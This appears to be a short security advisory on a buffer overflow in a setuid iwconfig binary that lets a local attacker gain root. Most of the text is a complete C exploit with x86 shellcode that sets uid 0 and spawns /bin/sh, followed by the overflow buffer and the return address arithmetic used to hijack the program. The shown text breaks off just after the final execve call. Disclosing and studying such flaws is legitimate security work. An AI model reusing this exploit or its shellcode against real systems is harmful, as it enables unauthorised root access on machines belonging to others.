Summary
Iwconfig "is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation". A buffer overflow vulnerability in iwconfig allows a local attacker to gain root privileges wherever the program is installed with setuid privileges.

Credit:
The information has been provided by Dcrab.
The original article can be found at: http://icis.digitalparadox.org/~dcrab/dc_iwconfig.c

Details
Exploit Code:
//Diabolic Crab's Local Root Exploit
///usr/sbin/iwconfig or /sbin/iwconfig
//dcrab@hackerscenter.com
//www.hackerscenter.com

#include <stdio.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main(int argc,char **argv){
char buf[96];
unsigned long ret;
int i;

char *prog[]={"/sbin/iwconfig",buf,NULL};
char *env[]={"EGG=",shellcode,NULL};

ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
printf("use ret addr: 0x%x\n",ret);

memset(buf,0x41,sizeof(buf));
memcpy(&buf[92],&ret,4);

execve(prog[0],prog,env);